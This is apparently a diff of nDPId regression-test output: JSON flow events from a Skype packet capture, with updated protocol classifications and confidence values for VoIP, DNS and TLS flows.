+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.34","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.171","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970679839,"flow_last_seen":1431970706169,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970634728,"flow_last_seen":1431970664345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970634728,"flow_last_seen":1431970664345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970655836,"flow_last_seen":1431970685642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1187,85 +1190,85 @@ 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970694308,"flow_last_seen":1431970701362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51303,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970695909,"flow_last_seen":1431970700948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970695909,"flow_last_seen":1431970700948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.121.84.93","src_port":51306,"dst_port":62381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1431970637197,"flow_last_seen":1431970705557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15399,"flow_avg_l4_payload_len":202,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970634432,"flow_last_seen":1431970687929,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970634431,"flow_last_seen":1431970687929,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1431970637197,"flow_last_seen":1431970705557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15399,"flow_avg_l4_payload_len":202,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970634432,"flow_last_seen":1431970687929,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970634431,"flow_last_seen":1431970687929,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970661447,"flow_last_seen":1431970679053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":500,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970661447,"flow_last_seen":1431970679053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":500,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970684583,"flow_last_seen":1431970693811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":391,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970684583,"flow_last_seen":1431970693811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":391,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.32","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970671951,"flow_last_seen":1431970671951,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970668973,"flow_last_seen":1431970668973,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
